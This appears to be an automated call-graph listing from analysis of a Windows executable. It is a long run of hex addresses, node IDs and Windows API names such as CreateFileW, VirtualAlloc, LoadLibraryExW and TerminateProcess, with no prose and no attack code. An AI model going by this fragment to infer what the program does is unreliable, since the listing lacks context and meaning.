9ed25e 104225->104230 104231 9ed295 104225->104231 104226 9ed0f3 104698 987b2e 104226->104698 104247 9ed188 Mailbox 104227->104247 104713 9858ba CloseHandle 104227->104713 104234 9a0db6 Mailbox 59 API calls 104230->104234 104232 9a0db6 Mailbox 59 API calls 104231->104232 104236 9ed29a 104232->104236 104233 9ed178 104711 989b3c 59 API calls 104233->104711 104238 9ed263 104234->104238 104241 987667 59 API calls 104236->104241 104236->104247 104243 987667 59 API calls 104238->104243 104245 9ed274 104238->104245 104241->104247 104242 9ed13a 104244 987de1 59 API calls 104242->104244 104243->104245 104248 9ed147 104244->104248 104714 9ffbce 59 API calls 2 library calls 104245->104714 104247->104147 104710 9e3a2a 63 API calls Mailbox 104248->104710 104250->104209 104250->104247 104251 9ed150 Mailbox 104251->104233 104253 989837 84 API calls 104252->104253 104254 9f4494 104253->104254 104730 986240 104254->104730 104256 9f44a4 104257 9f44c9 104256->104257 104258 989ea0 341 API calls 104256->104258 104259 989a98 59 API calls 104257->104259 104260 9f44cd 104257->104260 104258->104257 104259->104260 104260->104147 104262 9ed09a 104261->104262 104263 9ed0a5 104261->104263 104768 989b3c 59 API calls 104262->104768 104265 9ed17f Mailbox 104263->104265 104267 987667 59 API calls 104263->104267 104266 9a0db6 Mailbox 59 API calls 104265->104266 104305 9ed188 Mailbox 104265->104305 104268 9ed1c8 104266->104268 104269 9ed0c9 104267->104269 104270 9ed1d4 104268->104270 104771 9857a6 60 API calls Mailbox 104268->104771 104272 987667 59 API calls 104269->104272 104273 989837 84 API calls 104270->104273 104274 9ed0d2 104272->104274 104275 9ed1ec 104273->104275 104276 989837 84 API calls 104274->104276 104277 9857f6 67 API calls 104275->104277 104278 9ed0de 104276->104278 104279 9ed1fb 104277->104279 104280 98459b 59 API calls 104278->104280 104281 9ed1ff GetLastError 104279->104281 104282 9ed233 104279->104282 104283 9ed0f3 104280->104283 104284 9ed218 104281->104284 104287 9ed25e 104282->104287 104288 9ed295 104282->104288 104285 987b2e 59 API calls 104283->104285 104284->104305 104772 9858ba CloseHandle 104284->104772 104286 9ed126 104285->104286 104290 9ed178 104286->104290 104294 9e3c37 3 API calls 104286->104294 104291 9a0db6 Mailbox 59 API calls 104287->104291 104289 9a0db6 Mailbox 59 API calls 104288->104289 104293 9ed29a 104289->104293 104770 989b3c 59 API calls 104290->104770 104295 9ed263 104291->104295 104299 987667 59 API calls 104293->104299 104293->104305 104297 9ed136 104294->104297 104298 9ed274 104295->104298 104301 987667 59 API calls 104295->104301 104297->104290 104300 9ed13a 104297->104300 104773 9ffbce 59 API calls 2 library calls 104298->104773 104299->104305 104302 987de1 59 API calls 104300->104302 104301->104298 104304 9ed147 104302->104304 104769 9e3a2a 63 API calls Mailbox 104304->104769 104305->104147 104307 9ed150 Mailbox 104307->104290 104309 987667 59 API calls 104308->104309 104310 9fc2f4 104309->104310 104311 987667 59 API calls 104310->104311 104312 9fc2fc 104311->104312 104313 987667 59 API calls 104312->104313 104314 9fc304 104313->104314 104315 989837 84 API calls 104314->104315 104318 9fc312 104315->104318 104316 987924 59 API calls 104316->104318 104317 987bcc 59 API calls 104317->104318 104318->104316 104318->104317 104320 9fc4e2 104318->104320 104321 9fc4fd 104318->104321 104322 988047 59 API calls 104318->104322 104324 9fc528 Mailbox 104318->104324 104327 987e4f 59 API calls 104318->104327 104331 987e4f 59 API calls 104318->104331 104333 9fc4fb 104318->104333 104337 987cab 59 API calls 104318->104337 104338 989837 84 API calls 104318->104338 104339 987b2e 59 API calls 104318->104339 104323 987cab 59 API calls 104320->104323 104326 987cab 59 API calls 104321->104326 104322->104318 104325 9fc4ef 104323->104325 104324->104147 104328 987b2e 59 API calls 104325->104328 104329 9fc50c 104326->104329 104332 9fc3a9 CharUpperBuffW 104327->104332 104328->104333 104330 987b2e 59 API calls 104329->104330 104330->104333 104334 9fc469 CharUpperBuffW 104331->104334 104774 98843a 68 API calls 104332->104774 104333->104324 104776 989a3c 59 API calls Mailbox 104333->104776 104775 98c5a7 69 API calls 2 library calls 104334->104775 104337->104318 104338->104318 104339->104318 104341 9e7962 104340->104341 104342 9a0db6 Mailbox 59 API calls 104341->104342 104343 9e7970 104342->104343 104344 987667 59 API calls 104343->104344 104345 9e797e 104343->104345 104344->104345 104345->104147 104347 9fbc96 104346->104347 104348 9fbcb0 104346->104348 104777 9e9e4a 89 API calls 4 library calls 104347->104777 104778 9fa213 59 API calls Mailbox 104348->104778 104351 9fbcbb 104352 989ea0 340 API calls 104351->104352 104353 9fbd1c 104352->104353 104354 9fbdae 104353->104354 104358 9fbd5d 104353->104358 104379 9fbca8 Mailbox 104353->104379 104355 9fbe04 104354->104355 104356 9fbdb4 104354->104356 104357 989837 84 API calls 104355->104357 104355->104379 104798 9e791a 59 API calls 104356->104798 104359 9fbe16 104357->104359 104779 9e72df 59 API calls Mailbox 104358->104779 104361 987e4f 59 API calls 104359->104361 104364 9fbe3a CharUpperBuffW 104361->104364 104362 9fbdd7 104799 985d41 59 API calls Mailbox 104362->104799 104369 9fbe54 104364->104369 104366 9fbd8d 104780 98f460 104366->104780 104368 9fbddf Mailbox 104800 98fce0 341 API calls 2 library calls 104368->104800 104370 9fbe5b 104369->104370 104371 9fbea7 104369->104371 104801 9e72df 59 API calls Mailbox 104370->104801 104372 989837 84 API calls 104371->104372 104374 9fbeaf 104372->104374 104802 989e5d 60 API calls 104374->104802 104377 9fbe89 104378 98f460 340 API calls 104377->104378 104378->104379 104379->104147 104380 9fbeb9 104380->104379 104381 989837 84 API calls 104380->104381 104382 9fbed4 104381->104382 104803 985d41 59 API calls Mailbox 104382->104803 104384 9fbee4 104804 98fce0 341 API calls 2 library calls 104384->104804 105869 9d60c0 104386->105869 104388 9d618c 104388->104147 104389->104135 104390->104135 104391->104147 104392->104154 104393->104143 104394->104116 104395->104147 104396->104124 104397->104151 104398->104151 104399->104151 104400->104134 104401->104139 104402->104134 104441 989837 104403->104441 104407 9fcdb9 104408 9fcf2e 104407->104408 104413 9fcdc7 104407->104413 104509 9fd8c8 92 API calls Mailbox 104408->104509 104411 9fcf3d 104411->104413 104414 9fcf49 104411->104414 104412 989837 84 API calls 104431 9fcbb2 Mailbox 104412->104431 104472 9fc96e 104413->104472 104424 9fcb61 Mailbox 104414->104424 104419 9fce00 104487 9a0c08 104419->104487 104422 9fce1a 104493 9e9e4a 89 API calls 4 library calls 104422->104493 104423 9fce33 104494 9892ce 104423->104494 104424->104164 104427 9fce25 GetCurrentProcess TerminateProcess 104427->104423 104431->104407 104431->104412 104431->104424 104491 9ffbce 59 API calls 2 library calls 104431->104491 104492 9fcfdf 61 API calls 2 library calls 104431->104492 104432 9fcfa4 104432->104424 104437 9fcfb8 FreeLibrary 104432->104437 104434 9fce6b 104506 9fd649 107 API calls _free 104434->104506 104437->104424 104440 9fce7c 104440->104432 104507 988d40 59 API calls Mailbox 104440->104507 104508 989d3c 60 API calls Mailbox 104440->104508 104510 9fd649 107 API calls _free 104440->104510 104442 98984b 104441->104442 104443 989851 104441->104443 104442->104424 104459 9fd7a5 104442->104459 104444 9bf5d3 __i64tow 104443->104444 104445 989899 104443->104445 104447 989857 __itow 104443->104447 104451 9bf4da 104443->104451 104511 9a3698 83 API calls 3 library calls 104445->104511 104449 9a0db6 Mailbox 59 API calls 104447->104449 104450 989871 104449->104450 104450->104442 104453 987de1 59 API calls 104450->104453 104452 9a0db6 Mailbox 59 API calls 104451->104452 104457 9bf552 Mailbox _wcscpy 104451->104457 104454 9bf51f 104452->104454 104453->104442 104455 9a0db6 Mailbox 59 API calls 104454->104455 104456 9bf545 104455->104456 104456->104457 104458 987de1 59 API calls 104456->104458 104512 9a3698 83 API calls 3 library calls 104457->104512 104458->104457 104460 987e4f 59 API calls 104459->104460 104461 9fd7c0 CharLowerBuffW 104460->104461 104513 9df167 104461->104513 104465 987667 59 API calls 104466 9fd7f9 104465->104466 104520 98784b 104466->104520 104468 9fd810 104469 987d2c 59 API calls 104468->104469 104470 9fd81c Mailbox 104469->104470 104471 9fd858 Mailbox 104470->104471 104533 9fcfdf 61 API calls 2 library calls 104470->104533 104471->104431 104473 9fc989 104472->104473 104477 9fc9de 104472->104477 104474 9a0db6 Mailbox 59 API calls 104473->104474 104475 9fc9ab 104474->104475 104476 9a0db6 Mailbox 59 API calls 104475->104476 104475->104477 104476->104475 104478 9fda50 104477->104478 104479 9fdc79 Mailbox 104478->104479 104486 9fda73 _strcat _wcscpy __wsetenvp 104478->104486 104479->104419 104480 989be6 59 API calls 104480->104486 104481 989b3c 59 API calls 104481->104486 104482 989b98 59 API calls 104482->104486 104483 989837 84 API calls 104483->104486 104484 9a571c 58 API calls __crtCompareStringA_stat 104484->104486 104486->104479 104486->104480 104486->104481 104486->104482 104486->104483 104486->104484 104536 9e5887 61 API calls 2 library calls 104486->104536 104488 9a0c1d 104487->104488 104489 9a0cb5 VirtualAlloc 104488->104489 104490 9a0c83 104488->104490 104489->104490 104490->104422 104490->104423 104491->104431 104492->104431 104493->104427 104495 9892d6 104494->104495 104496 9a0db6 Mailbox 59 API calls 104495->104496 104497 9892e4 104496->104497 104498 9892f0 104497->104498 104537 9891fc 59 API calls Mailbox 104497->104537 104500 989050 104498->104500 104538 989160 104500->104538 104502 98905f 104503 9a0db6 Mailbox 59 API calls 104502->104503 104504 9890fb 104502->104504 104503->104504 104504->104440 104505 988d40 59 API calls Mailbox 104504->104505 104505->104434 104506->104440 104507->104440 104508->104440 104509->104411 104510->104440 104511->104447 104512->104444 104514 9df192 __wsetenvp 104513->104514 104515 9df1d1 104514->104515 104517 9df1c7 104514->104517 104519 9df278 104514->104519 104515->104465 104515->104470 104517->104515 104534 9878c4 61 API calls 104517->104534 104519->104515 104535 9878c4 61 API calls 104519->104535 104521 98785a 104520->104521 104522 9878b7 104520->104522 104521->104522 104524 987865 104521->104524 104523 987d2c 59 API calls 104522->104523 104525 987888 _memmove 104523->104525 104526 9beb09 104524->104526 104527 987880 104524->104527 104525->104468 104528 988029 59 API calls 104526->104528 104529 987f27 59 API calls 104527->104529 104530 9beb13 104528->104530 104529->104525 104531 9a0db6 Mailbox 59 API calls 104530->104531 104532 9beb33 104531->104532 104533->104471 104534->104517 104535->104519 104536->104486 104537->104498 104539 989169 Mailbox 104538->104539 104540 9bf19f 104539->104540 104545 989173 104539->104545 104541 9a0db6 Mailbox 59 API calls 104540->104541 104542 9bf1ab 104541->104542 104543 98917a 104543->104502 104545->104543 104546 989c90 59 API calls Mailbox 104545->104546 104546->104545 104548 989aa8 104547->104548 104549 9bf7d6 104547->104549 104554 9a0db6 Mailbox 59 API calls 104548->104554 104550 9bf7e7 104549->104550 104552 987bcc 59 API calls 104549->104552 104551 987d8c 59 API calls 104550->104551 104553 9bf7f1 104551->104553 104552->104550 104557 989ad4 104553->104557 104558 987667 59 API calls 104553->104558 104555 989abb 104554->104555 104555->104553 104556 989ac6 104555->104556 104556->104557 104559 987de1 59 API calls 104556->104559 104557->104169 104557->104172 104558->104557 104559->104557 104606 985aee 104560->104606 104563 985aee 2 API calls 104564 985d14 104563->104564 104564->104186 104566 98557d 104565->104566 104567 9855a2 104565->104567 104566->104567 104571 98558c 104566->104571 104568 987d8c 59 API calls 104567->104568 104572 9e325e 104568->104572 104569 9e328d 104569->104197 104573 985ab8 59 API calls 104571->104573 104572->104569 104616 9e31fa ReadFile SetFilePointerEx 104572->104616 104617 987924 59 API calls 2 library calls 104572->104617 104575 9e337e 104573->104575 104576 9854d2 61 API calls 104575->104576 104577 9e338c 104576->104577 104579 9e339c Mailbox 104577->104579 104618 9877da 61 API calls Mailbox 104577->104618 104579->104197 104580->104173 104582 985c6f CloseHandle 104581->104582 104583 985802 104582->104583 104619 985c99 104583->104619 104585 985821 104589 985844 104585->104589 104627 985610 104585->104627 104587 985833 104644 98527b SetFilePointerEx SetFilePointerEx 104587->104644 104589->104171 104589->104172 104600 9858ba CloseHandle 104589->104600 104590 9bdc07 104645 9e345a SetFilePointerEx SetFilePointerEx WriteFile 104590->104645 104591 98583a 104591->104589 104591->104590 104593 9bdc37 104593->104589 104594->104200 104596 985c88 104595->104596 104597 985c79 104595->104597 104596->104597 104598 985c8d CloseHandle 104596->104598 104597->104201 104599 9858ba CloseHandle 104597->104599 104598->104597 104599->104201 104600->104172 104601->104172 104602->104178 104603->104186 104604->104193 104605->104199 104613 985b08 104606->104613 104607 9bdd28 104615 985c4e SetFilePointerEx 104607->104615 104608 985b8f SetFilePointerEx 104614 985c4e SetFilePointerEx 104608->104614 104611 985b63 104611->104563 104612 9bdd42 104613->104607 104613->104608 104613->104611 104614->104611 104615->104612 104616->104572 104617->104572 104618->104579 104620 9bdd58 104619->104620 104621 985cb2 CreateFileW 104619->104621 104622 9bdd5e CreateFileW 104620->104622 104624 985cd4 104620->104624 104621->104624 104623 9bdd84 104622->104623 104622->104624 104625 985aee 2 API calls 104623->104625 104624->104585 104626 9bdd8f 104625->104626 104626->104624 104628 98562b 104627->104628 104631 9bdba5 104627->104631 104629 985aee 2 API calls 104628->104629 104643 9856ba 104628->104643 104630 98564d 104629->104630 104632 98522e 59 API calls 104630->104632 104633 985cdf 2 API calls 104631->104633 104631->104643 104634 985657 104632->104634 104633->104643 104634->104631 104635 985664 104634->104635 104636 9a0db6 Mailbox 59 API calls 104635->104636 104637 98566f 104636->104637 104638 98522e 59 API calls 104637->104638 104639 98567a 104638->104639 104640 985bc0 2 API calls 104639->104640 104641 9856a7 104640->104641 104642 985aee 2 API calls 104641->104642 104642->104643 104643->104587 104644->104591 104645->104593 104646->104207 104648 987667 59 API calls 104647->104648 104649 9845b1 104648->104649 104650 987667 59 API calls 104649->104650 104651 9845b9 104650->104651 104652 987667 59 API calls 104651->104652 104653 9845c1 104652->104653 104654 987667 59 API calls 104653->104654 104655 9845c9 104654->104655 104656 9845fd 104655->104656 104657 9bd4d2 104655->104657 104658 98784b 59 API calls 104656->104658 104659 988047 59 API calls 104657->104659 104660 98460b 104658->104660 104661 9bd4db 104659->104661 104662 987d2c 59 API calls 104660->104662 104663 987d8c 59 API calls 104661->104663 104664 984615 104662->104664 104666 984640 104663->104666 104665 98784b 59 API calls 104664->104665 104664->104666 104668 984636 104665->104668 104669 98465f 104666->104669 104682 984680 104666->104682 104684 9bd4fb 104666->104684 104667 98784b 59 API calls 104670 984691 104667->104670 104671 987d2c 59 API calls 104668->104671 104715 9879f2 104669->104715 104674 9846a3 104670->104674 104677 988047 59 API calls 104670->104677 104671->104666 104672 9bd5cb 104675 987bcc 59 API calls 104672->104675 104678 9846b3 104674->104678 104680 988047 59 API calls 104674->104680 104693 9bd588 104675->104693 104677->104674 104683 988047 59 API calls 104678->104683 104685 9846ba 104678->104685 104679 98784b 59 API calls 104679->104682 104680->104678 104681 9bd5b4 104681->104672 104687 9bd59f 104681->104687 104682->104667 104683->104685 104684->104672 104684->104681 104691 9bd532 104684->104691 104686 988047 59 API calls 104685->104686 104695 9846c1 Mailbox 104685->104695 104686->104695 104689 987bcc 59 API calls 104687->104689 104688 9bd590 104690 987bcc 59 API calls 104688->104690 104689->104693 104690->104693 104691->104688 104696 9bd57b 104691->104696 104692 9879f2 59 API calls 104692->104693 104693->104682 104693->104692 104718 987924 59 API calls 2 library calls 104693->104718 104695->104226 104697 987bcc 59 API calls 104696->104697 104697->104693 104699 9bec6b 104698->104699 104700 987b40 104698->104700 104725 9d7bdb 59 API calls _memmove 104699->104725 104719 987a51 104700->104719 104703 987b4c 104703->104233 104707 9e3c37 104703->104707 104704 9bec75 104705 988047 59 API calls 104704->104705 104706 9bec7d Mailbox 104705->104706 104726 9e445a GetFileAttributesW 104707->104726 104710->104251 104711->104250 104712->104213 104713->104247 104714->104247 104716 987e4f 59 API calls 104715->104716 104717 984669 104716->104717 104717->104679 104717->104682 104718->104693 104720 987a5f 104719->104720 104724 987a85 _memmove 104719->104724 104721 9a0db6 Mailbox 59 API calls 104720->104721 104720->104724 104722 987ad4 104721->104722 104723 9a0db6 Mailbox 59 API calls 104722->104723 104723->104724 104724->104703 104725->104704 104727 9e3c3e 104726->104727 104728 9e4475 FindFirstFileW 104726->104728 104727->104233 104727->104242 104728->104727 104729 9e448a FindClose 104728->104729 104729->104727 104755 987a16 104730->104755 104732 98646a 104762 98750f 59 API calls 2 library calls 104732->104762 104735 986484 Mailbox 104735->104256 104737 9bdff6 104765 9df8aa 91 API calls 4 library calls 104737->104765 104738 98750f 59 API calls 104749 986265 104738->104749 104742 987d8c 59 API calls 104742->104749 104743 9be004 104766 98750f 59 API calls 2 library calls 104743->104766 104745 9be01a 104745->104735 104746 986799 _memmove 104767 9df8aa 91 API calls 4 library calls 104746->104767 104747 9bdf92 104748 988029 59 API calls 104747->104748 104750 9bdf9d 104748->104750 104749->104732 104749->104737 104749->104738 104749->104742 104749->104746 104749->104747 104752 987e4f 59 API calls 104749->104752 104760 985f6c 60 API calls 104749->104760 104761 985d41 59 API calls Mailbox 104749->104761 104763 985e72 60 API calls 104749->104763 104764 987924 59 API calls 2 library calls 104749->104764 104754 9a0db6 Mailbox 59 API calls 104750->104754 104753 98643b CharUpperBuffW 104752->104753 104753->104749 104754->104746 104756 9a0db6 Mailbox 59 API calls 104755->104756 104757 987a3b 104756->104757 104758 988029 59 API calls 104757->104758 104759 987a4a 104758->104759 104759->104749 104760->104749 104761->104749 104762->104735 104763->104749 104764->104749 104765->104743 104766->104745 104767->104735 104768->104263 104769->104307 104770->104265 104771->104270 104772->104305 104773->104305 104774->104318 104775->104318 104776->104324 104777->104379 104778->104351 104779->104366 104781 98f4ba 104780->104781 104782 98f650 104780->104782 104783 9c441e 104781->104783 104784 98f4c6 104781->104784 104785 987de1 59 API calls 104782->104785 104786 9fbc6b 341 API calls 104783->104786 104888 98f290 341 API calls 2 library calls 104784->104888 104791 98f58c Mailbox 104785->104791 104788 9c442c 104786->104788 104792 98f630 104788->104792 104890 9e9e4a 89 API calls 4 library calls 104788->104890 104790 98f4fd 104790->104788 104790->104791 104790->104792 104794 98f5e3 104791->104794 104797 9e3c37 3 API calls 104791->104797 104805 9ecb7a 104791->104805 104885 9fdf37 104791->104885 104792->104379 104794->104792 104889 989c90 59 API calls Mailbox 104794->104889 104797->104794 104798->104362 104799->104368 104800->104379 104801->104377 104802->104380 104803->104384 104804->104379 104806 987667 59 API calls 104805->104806 104807 9ecbaf 104806->104807 104808 987667 59 API calls 104807->104808 104809 9ecbb8 104808->104809 104810 9ecbcc 104809->104810 105024 989b3c 59 API calls 104809->105024 104812 989837 84 API calls 104810->104812 104813 9ecbe9 104812->104813 104814 9eccea 104813->104814 104815 9ecc0b 104813->104815 104884 9ecd1a Mailbox 104813->104884 104891 984ddd 104814->104891 104816 989837 84 API calls 104815->104816 104819 9ecc17 104816->104819 104821 988047 59 API calls 104819->104821 104820 9ecd16 104824 987667 59 API calls 104820->104824 104820->104884 104822 9ecc23 104821->104822 104827 9ecc69 104822->104827 104828 9ecc37 104822->104828 104823 984ddd 136 API calls 104823->104820 104825 9ecd4b 104824->104825 104826 987667 59 API calls 104825->104826 104829 9ecd54 104826->104829 104831 989837 84 API calls 104827->104831 104830 988047 59 API calls 104828->104830 104832 987667 59 API calls 104829->104832 104833 9ecc47 104830->104833 104834 9ecc76 104831->104834 104835 9ecd5d 104832->104835 104837 987cab 59 API calls 104833->104837 104838 988047 59 API calls 104834->104838 104836 987667 59 API calls 104835->104836 104839 9ecd66 104836->104839 104840 9ecc51 104837->104840 104841 9ecc82 104838->104841 104843 989837 84 API calls 104839->104843 104844 989837 84 API calls 104840->104844 105025 9e4a31 GetFileAttributesW 104841->105025 104846 9ecd73 104843->104846 104847 9ecc5d 104844->104847 104845 9ecc8b 104848 9ecc9e 104845->104848 104851 9879f2 59 API calls 104845->104851 104849 98459b 59 API calls 104846->104849 104850 987b2e 59 API calls 104847->104850 104853 989837 84 API calls 104848->104853 104859 9ecca4 104848->104859 104852 9ecd8e 104849->104852 104850->104827 104851->104848 104854 9879f2 59 API calls 104852->104854 104855 9ecccb 104853->104855 104856 9ecd9d 104854->104856 105026 9e37ef 75 API calls Mailbox 104855->105026 104858 9ecdd1 104856->104858 104861 9879f2 59 API calls 104856->104861 104860 988047 59 API calls 104858->104860 104859->104884 104862 9ecddf 104860->104862 104863 9ecdae 104861->104863 104864 987b2e 59 API calls 104862->104864 104863->104858 104866 987bcc 59 API calls 104863->104866 104865 9ecded 104864->104865 104867 987b2e 59 API calls 104865->104867 104868 9ecdc3 104866->104868 104869 9ecdfb 104867->104869 104870 987bcc 59 API calls 104868->104870 104871 987b2e 59 API calls 104869->104871 104870->104858 104872 9ece09 104871->104872 104873 989837 84 API calls 104872->104873 104874 9ece15 104873->104874 104915 9e4071 104874->104915 104876 9ece26 104877 9e3c37 3 API calls 104876->104877 104878 9ece30 104877->104878 104879 989837 84 API calls 104878->104879 104882 9ece61 104878->104882 104880 9ece4e 104879->104880 104969 9e9155 104880->104969 105027 984e4a 104882->105027 104884->104794 104886 9fcadd 130 API calls 104885->104886 104887 9fdf47 104886->104887 104887->104794 104888->104790 104889->104794 104890->104792 105033 984bb5 104891->105033 104896 984e08 LoadLibraryExW 105043 984b6a 104896->105043 104897 9bd8e6 104898 984e4a 84 API calls 104897->104898 104900 9bd8ed 104898->104900 104902 984b6a 3 API calls 104900->104902 104904 9bd8f5 104902->104904 105069 984f0b 104904->105069 104905 984e2f 104905->104904 104906 984e3b 104905->104906 104908 984e4a 84 API calls 104906->104908 104910 984e40 104908->104910 104910->104820 104910->104823 104912 9bd91c 105077 984ec7 104912->105077 104916 9e408d 104915->104916 104917 9e4092 104916->104917 104918 9e40a0 104916->104918 104919 988047 59 API calls 104917->104919 104920 987667 59 API calls 104918->104920 104921 9e409b Mailbox 104919->104921 104922 9e40a8 104920->104922 104921->104876 104923 987667 59 API calls 104922->104923 104924 9e40b0 104923->104924 104925 987667 59 API calls 104924->104925 104926 9e40bb 104925->104926 104927 987667 59 API calls 104926->104927 104928 9e40c3 104927->104928 104929 987667 59 API calls 104928->104929 104930 9e40cb 104929->104930 104931 987667 59 API calls 104930->104931 104932 9e40d3 104931->104932 104933 987667 59 API calls 104932->104933 104934 9e40db 104933->104934 104935 987667 59 API calls 104934->104935 104936 9e40e3 104935->104936 104937 98459b 59 API calls 104936->104937 104938 9e40fa 104937->104938 104939 98459b 59 API calls 104938->104939 104940 9e4113 104939->104940 104941 9879f2 59 API calls 104940->104941 104942 9e411f 104941->104942 104943 9e4132 104942->104943 104944 987d2c 59 API calls 104942->104944 104945 9879f2 59 API calls 104943->104945 104944->104943 104946 9e413b 104945->104946 104947 9e414b 104946->104947 104948 987d2c 59 API calls 104946->104948 104949 988047 59 API calls 104947->104949 104948->104947 104950 9e4157 104949->104950 104951 987b2e 59 API calls 104950->104951 104952 9e4163 104951->104952 105504 9e4223 59 API calls 104952->105504 104954 9e4172 105505 9e4223 59 API calls 104954->105505 104956 9e4185 104957 9879f2 59 API calls 104956->104957 104958 9e418f 104957->104958 104959 9e41a6 104958->104959 104960 9e4194 104958->104960 104962 9879f2 59 API calls 104959->104962 104961 987cab 59 API calls 104960->104961 104963 9e41a1 104961->104963 104964 9e41af 104962->104964 104967 987b2e 59 API calls 104963->104967 104965 9e41cd 104964->104965 104966 987cab 59 API calls 104964->104966 104968 987b2e 59 API calls 104965->104968 104966->104963 104967->104965 104968->104921 104970 9e9162 __write_nolock 104969->104970 104971 9a0db6 Mailbox 59 API calls 104970->104971 104972 9e91bf 104971->104972 104973 98522e 59 API calls 104972->104973 104974 9e91c9 104973->104974 104975 9e8f5f GetSystemTimeAsFileTime 104974->104975 104976 9e91d4 104975->104976 104977 984ee5 85 API calls 104976->104977 104978 9e91e7 _wcscmp 104977->104978 104979 9e920b 104978->104979 104980 9e92b8 104978->104980 105536 9e9734 104979->105536 104982 9e9734 96 API calls 104980->104982 104997 9e9284 _wcscat 104982->104997 104985 984f0b 74 API calls 104987 9e92dd 104985->104987 104986 9e92c1 104986->104882 104988 984f0b 74 API calls 104987->104988 104990 9e92ed 104988->104990 104989 9e9239 _wcscat _wcscpy 105543 9a40fb 58 API calls __wsplitpath_helper 104989->105543 104991 984f0b 74 API calls 104990->104991 104993 9e9308 104991->104993 104994 984f0b 74 API calls 104993->104994 104995 9e9318 104994->104995 104996 984f0b 74 API calls 104995->104996 104998 9e9333 104996->104998 104997->104985 104997->104986 104999 984f0b 74 API calls 104998->104999 105000 9e9343 104999->105000 105001 984f0b 74 API calls 105000->105001 105002 9e9353 105001->105002 105003 984f0b 74 API calls 105002->105003 105004 9e9363 105003->105004 105506 9e98e3 GetTempPathW GetTempFileNameW 105004->105506 105006 9e936f 105007 9a525b 115 API calls 105006->105007 105017 9e9380 105007->105017 105008 9e943a 105520 9a53a6 105008->105520 105011 984f0b 74 API calls 105011->105017 105017->104986 105017->105008 105017->105011 105507 9a4863 105017->105507 105024->104810 105025->104845 105026->104859 105028 984e54 105027->105028 105030 984e5b 105027->105030 105029 9a53a6 __fcloseall 83 API calls 105028->105029 105029->105030 105031 984e6a 105030->105031 105032 984e7b FreeLibrary 105030->105032 105031->104884 105032->105031 105082 984c03 105033->105082 105036 984bdc 105037 984bec FreeLibrary 105036->105037 105038 984bf5 105036->105038 105037->105038 105040 9a525b 105038->105040 105039 984c03 2 API calls 105039->105036 105086 9a5270 105040->105086 105042 984dfc 105042->104896 105042->104897 105244 984c36 105043->105244 105046 984b8f 105048 984baa 105046->105048 105049 984ba1 FreeLibrary 105046->105049 105047 984c36 2 API calls 105047->105046 105050 984c70 105048->105050 105049->105048 105051 9a0db6 Mailbox 59 API calls 105050->105051 105052 984c85 105051->105052 105053 98522e 59 API calls 105052->105053 105054 984c91 _memmove 105053->105054 105055 984ccc 105054->105055 105057 984d89 105054->105057 105058 984dc1 105054->105058 105056 984ec7 69 API calls 105055->105056 105066 984cd5 105056->105066 105248 984e89 CreateStreamOnHGlobal 105057->105248 105259 9e991b 95 API calls 105058->105259 105061 984f0b 74 API calls 105061->105066 105063 984d69 105063->104905 105064 9bd8a7 105065 984ee5 85 API calls 105064->105065 105067 9bd8bb 105065->105067 105066->105061 105066->105063 105066->105064 105254 984ee5 105066->105254 105068 984f0b 74 API calls 105067->105068 105068->105063 105070 984f1d 105069->105070 105071 9bd9cd 105069->105071 105283 9a55e2 105070->105283 105074 9e9109 105481 9e8f5f 105074->105481 105076 9e911f 105076->104912 105078 9bd990 105077->105078 105079 984ed6 105077->105079 105486 9a5c60 105079->105486 105081 984ede 105083 984bd0 105082->105083 105084 984c0c LoadLibraryA 105082->105084 105083->105036 105083->105039 105084->105083 105085 984c1d GetProcAddress 105084->105085 105085->105083 105088 9a527c _fprintf 105086->105088 105087 9a528f 105135 9a8b28 58 API calls __getptd_noexit 105087->105135 105088->105087 105090 9a52c0 105088->105090 105105 9b04e8 105090->105105 105091 9a5294 105136 9a8db6 9 API calls _fprintf 105091->105136 105094 9a52c5 105095 9a52db 105094->105095 105096 9a52ce 105094->105096 105098 9a5305 105095->105098 105099 9a52e5 105095->105099 105137 9a8b28 58 API calls __getptd_noexit 105096->105137 105120 9b0607 105098->105120 105138 9a8b28 58 API calls __getptd_noexit 105099->105138 105100 9a529f @_EH4_CallFilterFunc@8 _fprintf 105100->105042 105106 9b04f4 _fprintf 105105->105106 105107 9a9c0b __lock 58 API calls 105106->105107 105117 9b0502 105107->105117 105108 9b0576 105140 9b05fe 105108->105140 105109 9b057d 105145 9a881d 58 API calls 2 library calls 105109->105145 105112 9b05f3 _fprintf 105112->105094 105113 9b0584 105113->105108 105146 9a9e2b InitializeCriticalSectionAndSpinCount 105113->105146 105116 9a9c93 __mtinitlocknum 58 API calls 105116->105117 105117->105108 105117->105109 105117->105116 105143 9a6c50 59 API calls __lock 105117->105143 105144 9a6cba LeaveCriticalSection LeaveCriticalSection _doexit 105117->105144 105118 9b05aa EnterCriticalSection 105118->105108 105129 9b0627 __wopenfile 105120->105129 105121 9b0641 105151 9a8b28 58 API calls __getptd_noexit 105121->105151 105123 9b07fc 105123->105121 105127 9b085f 105123->105127 105124 9b0646 105152 9a8db6 9 API calls _fprintf 105124->105152 105126 9a5310 105139 9a5332 LeaveCriticalSection LeaveCriticalSection _fprintf 105126->105139 105148 9b85a1 105127->105148 105129->105121 105129->105123 105129->105129 105153 9a37cb 60 API calls 2 library calls 105129->105153 105131 9b07f5 105131->105123 105154 9a37cb 60 API calls 2 library calls 105131->105154 105133 9b0814 105133->105123 105155 9a37cb 60 API calls 2 library calls 105133->105155 105135->105091 105136->105100 105137->105100 105138->105100 105139->105100 105147 9a9d75 LeaveCriticalSection 105140->105147 105142 9b0605 105142->105112 105143->105117 105144->105117 105145->105113 105146->105118 105147->105142 105156 9b7d85 105148->105156 105150 9b85ba 105150->105126 105151->105124 105152->105126 105153->105131 105154->105133 105155->105123 105157 9b7d91 _fprintf 105156->105157 105158 9b7da7 105157->105158 105160 9b7ddd 105157->105160 105241 9a8b28 58 API calls __getptd_noexit 105158->105241 105167 9b7e4e 105160->105167 105161 9b7dac 105242 9a8db6 9 API calls _fprintf 105161->105242 105164 9b7df9 105243 9b7e22 LeaveCriticalSection __unlock_fhandle 105164->105243 105166 9b7db6 _fprintf 105166->105150 105168 9b7e6e 105167->105168 105169 9a44ea __wsopen_nolock 58 API calls 105168->105169 105173 9b7e8a 105169->105173 105170 9b7fc1 105171 9a8dc6 __invoke_watson 8 API calls 105170->105171 105172 9b85a0 105171->105172 105174 9b7d85 __wsopen_helper 103 API calls 105172->105174 105173->105170 105175 9b7ec4 105173->105175 105181 9b7ee7 105173->105181 105176 9b85ba 105174->105176 105177 9a8af4 __wsopen_nolock 58 API calls 105175->105177 105176->105164 105178 9b7ec9 105177->105178 105179 9a8b28 _fprintf 58 API calls 